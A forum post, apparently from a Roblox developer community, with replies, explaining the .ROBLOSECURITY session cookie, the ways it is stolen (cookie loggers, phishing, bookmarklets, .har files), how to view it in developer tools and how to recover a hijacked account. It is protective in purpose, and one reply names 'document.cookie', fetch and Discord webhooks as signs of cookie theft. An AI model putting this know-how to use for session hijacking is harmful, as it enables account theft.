About the .ROBLOSECURITY cookie

Today, we will learn about the .ROBLOSECURITY cookie, what is it, how can you reset it and more!

Before, we start what exactly is a cookie?
A cookie is a small piece of data or file. Your browser stores these cookies. These cookies are used to improve user experience or remember user information. For example: some cookies keep the user logged in and save all kinds of stuff like preferences, what have you saved on a shopping cart and remember user data such as passwords. This is a good thing. These cookies are known as HTTP cookies. However, not all cookies are good. Third party cookies track you across the web.

What is the .ROBLOSECURITY cookie?
The .ROBLOSECURITY cookie is a browser cookie used by Roblox. This cookie stores the user session. This cookie is also used to see the user who is logged in. You should keep this safe.

Cookie security

It is not all fun and games. This .ROBLOSECURITY cookie can be hacked. When a hacker gets your cookie, they can sign in to your account with no verification. Even, no 2-step-verification (2SV). There are several ways how can this cookie get hacked.

Cookie loggers

These loggers can be extensions or software. They have malicious code to get your cookie and hack you. The loggers then silently send your cookie to the attacker or a server by the attacker, sometimes these sneaky loggers are able to not be dedected by anti-virus software. These are coded on JavaScript and other popular languages.

Social engineering

Social engineering is when someone tries to trick you into revealing your cookie. This involves exploiting human psychology. There are many forms of social engineering like phishing, vishing, baiting, impersonating. When someone is trying to build up your trust to reveal the cookie, it is a form of social engineering. Do not trust anyone. Be suspicious of everyone. This happens all the time, with small to big people, this is everywhere.

JavaScript

This programming language is notorious for malware and viruses. It is also great for interactive websites. But, this powered language is also used to steal cookies. With malicious JavaScript code, extensions, software, bookmarks and more can be used to steal your .ROBLOSECURITY cookie.

.har File

Has someone told you to send them a .har file? That is dangerous and can steal your cookie. You should not send them anything about this cookie or the file.

How can I see my cookie?

Before starting, please keep in mind, these extensions may steal your cookies, and I recommend doing it the Developer Tools way, this is for simple.

  1. Install a cookie extension (I use EditMyCookie).

  2. Go to Roblox.

  3. Open your cookie extension

  4. View the .ROBLOSECURITY cookie

  5. See it, it starts with |WARNING:-DO-NOT-SHARE-THIS.–Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.| and also has random digits.

Never share this!

Developer tools way

This way requires no extension and is recommended.
Thanks to this post for telling me this is possible:

Bing/Edge:

  1. Go to Developer Tools, simply click the three dots or Alt+F, then click More tools then Developer tools, should look like this: (The code can be different, should look similar)

  1. Click the right-side arrows, they look like this:

  1. You should see options like Security, CSS Overview and more.

  2. Click Application

  3. You should see some site stuff, click Cookies (the arrow)

  4. You will see down a cookie called https://www.roblox.com

  5. Click https://www.roblox.com, your screen should look like this:

  1. Click the .ROBLOSECURITY cookie (You can look at the names list and find it)

  2. Congratulations for finding your cookie! Your screen should look like this: (Do not screen-record this or send this)

Almost uploaded the uncensored version of the cookie! :cookie:

Google:

Google has the same steps and UI as Bing.

Other browsers probably have the same steps.

We have learned about what are cookies, what is .ROBLOSECURITY and some ways that they can be stealed. Here is how to secure your cookie:

I think my cookie is stolen, what do I do?

You must click the Sign out of other sessions button at your settings to reset your cookie and make your old one not working.

I think I have a hidden cookie logger, what do I do?

If you are suspicious about a cookie logger, you can research the suspected extension or file.

It is best to run a security scan using a trusted anti-virus or VirusTotal.

I am downloading something, it may be a cookie logger. What do I do?

Not everything you download is a cookie logger or virus.

Before installing, you must research what you are downloading for authenticity, security and see the reviews.

Make sure that you are downloading the program from the actual or trusted site. Some sites can disguise the app with a unwanted virus or cookie logger.

Make sure that the app you will install is the newest version, older versions may be buggier.

Installed? See if your device is weird after installing. Is it slow and taking up most resources? Possible crypto miner. Is your device getting bombarded with advertisements? Spyware. Is your device acting strange? Virus. When those happen, remove what you have downloaded.

This should apply when you are downloading extensions and software.

My account was hacked because of a cookie logger. What do I do?

You can try signing in with your verification or backup codes.

Did that happen when you installed a extension or file? Most likely, it is the cause. Remove it. You should also run a security scan to check the bad things that steal your data.

If that did not work, contact Roblox Support to give you back your account and they can give you stolen robux and items too. They can only do 1 rollback. You should prove to them you are the owner. You can try sending images and more proof.

If you got or did not get your account back, at least you learned the danger of cookies and how to avoid it next time.

Thank you for reading! Now you know cookies, how do they get hacked and how to prevent hacking!

Updatelog
Update 1: Release
Update 2: Seeing your cookie added
Update 3: I found out this was useless. It provides no value for developers, but I will keep it for some people.
Update 4: Updated the seeing cookie method to be secure, since extensions can steal stuff, it is recommended to use the Developer Tools way.

11 Likes

You don’t need a cookie extension to view the cookie, you can press F12, then application then go through the cookies until you find .ROBLOSECURITY

Other then that, great job, now I can secure my account more!

4 Likes

No problem, glad this helped! I will try doing F12.

1 Like

Update: Nothing happens, I am on Bing (do not bomb my house), I will try going to Developer Tools.

Update 2: I found how to do it on Bing, I will update it.

1 Like

how in the world bookmarks can steal cookies

by resetting your password*

1 Like

Basically adding a website to your bookmark is the exact same thing as typing a website name in the address bar except you didn’t type it in and you just have to click on the icon. Address bars can also execute JavaScript code so as a result bookmarks have the ability to execute JavaScript code that can steal your cookies. This JavaScript code is usually obfuscated so it will be pretty hard to tell what the code is exactly doing which should be a immediate red flag.

If you want more information on this subject you should watch this video:

@IWasTaked0 I think you should mention to not give anyone a .har file on Roblox as those can also give access to your .ROBLOSECURITY cookie

1 Like

This mentions the .har file risks and danger and I clearly mentioned it steals your cookies.

2 Likes

Activate windows… PLEASE!!!

Anyway, cookie method 3: console.

Using the console, any errors, prints, or warnings will show, as well as the result of any typed code. This includes variable names. You can run “document.cookie” to see all your cookies, including the .ROBLOSECURITY! If you’re executing unknown code, look out for this variable, and things like fetch, XMLHttpRequest, etc. Large bookmarklets commonly use external scripts (.js files), so open those in a new tab to view them. Please note that code involving making requests to a site usually needs your cookies on that site. Roblox request = roblox cookie! Discord webhook != roblox cookie!

Sorry to bump but is rblx.social a cookie logger or something?

Again sorry for the dumb question, but I wanna know if it’s a roblox redirect or not

It redirects me to roblox but it’s impossible for another website to steal your cookie like that

I saw a reddit post similar to the link that I’m talking about.

It’s a phishing website, it mimics roblox’s website and gets u to login normally and it sends your info to their discord webhook, theres no logging of your ip or any cookies by just visiting the site, i have seen much source code of these websites

Ohh, I read it wrong cause I thought the link was like a cookie grabber type or something cause these scams getting more advanced by the days.

They’re not getting advanced in terms of grabbing ur data, they’re getting advanced in terms of tricking u to give them the data, their technical side is not advanced

Yeah, but the part which got my eye was this:

It’s a cookie grabber, ROBLOSECURITY has your details logged as a cookie if you click on that link it could take your ROBLOSECURITY cookie and replace his own one with yours.

And I was wondering if that was even possible.

It’s just not possible, it would be a major security breach for roblox and the company itself would be in shambles

1 Like